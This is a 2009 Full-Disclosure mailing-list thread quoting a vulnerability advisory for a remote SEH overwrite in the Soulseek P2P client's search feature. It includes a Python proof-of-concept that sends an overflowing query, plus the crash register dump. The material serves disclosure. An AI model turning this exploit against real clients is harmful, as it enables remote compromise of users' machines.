[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Soulseek * P2P Remote Distributed Search Code Execution



Seems like you have a problem with responsible disclosure Kid ;
Do you have any familly relationship with jeremy Brown ? ;P

http://g-laurent.blogspot.com/2009/05/soulseek-p2p-remote-distributed-search.html#comments

2009/5/25 Pete Licoln <pete.licoln@xxxxxxxxx>

> Oh so you have a blog ...
> http://g-laurent.blogspot.com/
>
> 2009/5/25 laurent gaffie <laurent.gaffie@xxxxxxxxx>
>
>>  =============================================
>> - Release date: May 24th, 2009
>> - Discovered by: Laurent Gaffié
>> - Severity: critical
>> =============================================
>>
>> I. VULNERABILITY
>> -------------------------
>> Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution
>>
>> II. BACKGROUND
>> -------------------------
>> "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
>> sharing application.
>> One of the things that makes Soulseek(tm) unique is our community and
>> community-related features.
>> Based on peer-to-peer technology, virtual rooms allow you to meet people
>> with
>> the same interests, share information, and chat freely using real-time
>> messages
>> in public or private.
>> Soulseek(tm), with its built-in people matching system, is a great way to
>> make
>> new friends and expand your mind!"
>>
>> III. DESCRIPTION
>> -------------------------
>> Soulseek client allows distributed file search to one person, everyone, or
>> in a
>> specific Soulseek IRC channel, allowing a user to find the files he wants,
>> in
>> a dedicated channel, or with his contacts, or on the whole network.
>> Unfortunatly this feature is vulnerable to a remote SEH overwrite to a
>> specific
>> user, or even to a whole Soulseek IRC channel.
>>
>> IV. PROOF OF CONCEPT
>> -------------------------
>> This proof of concept is made to prevent a S-K party, it is only build to
>> target the user "testt4321".
>>
>> To try this proof of concept, you would have to open a soulseek client and
>> use
>> the username:
>> "testt4321"
>> with the password:
>> "12345678"
>> And launch this code.
>> If you want to change the username or target a whole channel, you would
>> have
>> to reverse the binary protocol
>>
>>
>>
>> #!/usr/bin/python
>> import struct
>> import sys, socket
>> from time import *
>>
>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>> s.connect(("208.76.170.50",2242))  # Change to Port 2240 for 156* branch
>>
>> buffer =
>> "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74"
>> buffer+=
>> "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38"
>> buffer+=
>> "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30"
>> buffer+=
>> "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35"
>> buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00"
>>
>> s.send(buffer)
>> sleep(1)
>>
>> junk = "\x41" * 3084
>> next_seh = struct.pack('<L', 0x42424242)
>> seh =      struct.pack('<L', 0x43434343)
>> other_junk = "\x61" * 1423
>>
>> buffer2 =
>> "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74"
>> buffer2+=
>> "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk
>> s.send(buffer2)
>> sleep(1)
>> s.recv(1024)
>>
>>
>>
>> After the query is send, the memory will look like this
>> 0012FBE4   41414141
>> 0012FBE8   42424242  Pointer to next SEH record
>> 0012FBEC   43434343  SE handler
>> 0012FBF0   61616161
>>
>> And the program will terminate with this structure:
>> EAX 00000000
>> ECX 43434343
>> EDX 7C9132BC ntdll.7C9132BC
>> EBX 00000000
>> ESP 0012EA78
>> EBP 0012EA98
>> ESI 00000000
>> EDI 00000000
>> EIP 43434343
>>
>>
>> V. BUSINESS IMPACT
>> -------------------------
>> An attacker could exploit this vulnerability to compromise any Soulseek
>> client connected to
>> the Soulseek network.
>>
>> VI. SYSTEMS AFFECTED
>> -------------------------
>> Windows all versions running Soulseek *
>>
>> VII. SOLUTION
>> -------------------------
>> A fast solution would be to use Nicotine-Plus (
>> http://nicotine-plus.sourceforge.net/)
>> a Python Soulseek client.
>> Another quick workaround (at server level) would be to limit the search
>> query lenght.
>>
>> VIII. REFERENCES
>> -------------------------
>> http://www.slsknet.org
>>
>> IX. CREDITS
>> -------------------------
>> This vulnerability has been discovered by Laurent Gaffié
>> Laurent.gaffie{remove-this}(at)gmail.com
>>
>>
>> X. REVISION HISTORY
>> -------------------------
>> May 24, 2009: Initial release
>>
>>
>> XI. DISCLOSURE TIMELINE
>> -------------------------
>> july      29, 2008: Bug discovered
>> September 03, 2008: Vendor contacted; no response.
>> October   14, 2008: Vendor contacted; still no response.
>> April     12, 2009: Idefense contacted.
>> April     13, 2009: Idefense answered.
>> April     23, 2009: Advisory send to idefense contributor program.
>> May       13, 2009: Idefense contacted, bug rejected (no reason given)
>> May       15, 2009: Idefense recontacted; no answer.
>> May       16, 2009: Last try to contact Soulseek maintainers
>> May       24, 2009: Advisory published.
>>
>> XII. LEGAL NOTICES
>> -------------------------
>> The information contained within this advisory is supplied "as-is"
>> with no warranties or guarantees of fitness of use or otherwise.
>> I accept no responsibility for any damage caused by the use or
>> misuse of this information.
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/